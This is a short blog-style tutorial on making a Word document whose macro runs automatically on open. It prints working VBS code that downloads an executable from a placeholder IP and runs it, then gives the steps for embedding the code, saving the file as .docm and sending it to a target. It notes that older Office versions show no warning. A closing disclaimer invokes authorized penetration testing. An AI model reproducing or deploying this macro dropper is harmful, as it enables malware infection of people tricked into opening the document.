Creating Malicious Word Macros Tutorial : AutoRun Stub via Word Document
Free Give Away
Penetration testers often need to use social engineering attacks . What is more better than creating a Microsoft Office Word document that contains the payload and exploit in form of a Macro . That is easy … might be common now ….
What if the Word Macro would Auto start and execute the payload instantly ? This tutorial explains exactly how to do that .
We will start by creating a Word Macro .
Step 1: Create a payload. Macros use VBS for macros, so it’s not hard to make them, but many are already made. Here is an example DL and Execute payload:
Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<IP>/<FILE>", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "file.exe", 2 '//overwrite
End With
Shell ("file.exe")
End Sub
Step 2: Now that you have a payload, you need to enable the developer option.
To do that, simply go to
File -> Options -> Customize Ribbon -> Click on the box for “Developer”
Step 3: Go to the Developer tab and click on “Visual Basic”
Step 4: Double click on ThisDocument
Step 5: Paste this code into the field that appears
Private Sub Document_Open()
[payload]
End SubReplace [payload] with the VBS script you’re using in your macro.
Here is a screen shot for better understanding :
Step 6: Now just save the file as filename.docm, send it to the target, and watch as it auto runs your stub. They may get a security warning about the macro, but if they’re running an older version of Microsoft Office, they won’t.
Please Feel free to post in comments in case you are stuck anywhere . This technique is for penetration testing and to be used only in Authorized Penetration tests by Penetration testers .
Purely for Educational Purposes !
Like and Share if you like the Post
Vanshit Malhotra 